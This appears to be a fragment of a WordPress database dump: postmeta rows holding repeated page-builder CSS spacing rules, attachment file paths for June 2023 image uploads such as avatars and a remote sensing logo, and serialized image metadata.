(34734,4898,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}'),
(34735,4899,'_wp_attached_file','2023/06/nagy.jpeg'),
(34736,4899,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:632;s:6:\"height\";i:625;s:4:\"file\";s:17:\"2023/06/nagy.jpeg\";s:8:\"filesize\";i:95348;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"nagy-300x297.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:297;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16034;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"nagy-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6262;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"nagy-500x494.jpeg\";s:5:\"width\";i:500;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33818;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34737,4900,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}'),
(34738,4901,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}'),
(34739,4902,'_wpb_shortcodes_custom_css','.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34740,4903,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861835833{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34741,4904,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861835833{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687861930301{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34742,4905,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687861930301{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34743,4906,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687862167348{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34745,4908,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687862522700{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34754,4916,'_wpb_shortcodes_custom_css','.vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687860528620{padding-right: 5px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687862786456{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687862774089{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(34771,4936,'_wp_attached_file','2023/06/Yasser-Elrashidi.jpg'),
(34772,4936,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:128;s:6:\"height\";i:128;s:4:\"file\";s:28:\"2023/06/Yasser-Elrashidi.jpg\";s:8:\"filesize\";i:4104;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34773,4939,'_wp_attached_file','2023/06/avatar.jpeg'),
(34774,4939,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:297;s:6:\"height\";i:389;s:4:\"file\";s:19:\"2023/06/avatar.jpeg\";s:8:\"filesize\";i:15569;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"avatar-229x300.jpeg\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8099;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"avatar-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4153;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:24:\"Getty Images/iStockphoto\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:34:\"Businessman avatar icon in colors.\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:34:\"Businessman avatar icon in colors.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(34785,4956,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34786,4957,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34787,4958,'_wp_attached_file','2023/06/remote_sensing_logo.jpeg'),
(34788,4958,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:227;s:6:\"height\";i:222;s:4:\"file\";s:32:\"2023/06/remote_sensing_logo.jpeg\";s:8:\"filesize\";i:10565;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"remote_sensing_logo-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34789,4959,'_wp_attached_file','2023/06/remote_sensing_logo.png'),
(34790,4959,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:227;s:6:\"height\";i:222;s:4:\"file\";s:31:\"2023/06/remote_sensing_logo.png\";s:8:\"filesize\";i:58957;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"remote_sensing_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36539;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34791,4960,'_wpb_shortcodes_custom_css','.vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873543921{margin-bottom: 10px !important;}.vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}.vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}.vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}.vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}.vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}'),
(34792,4963,'_wp_attached_file','2023/06/ayman_elzagh.jpg'),
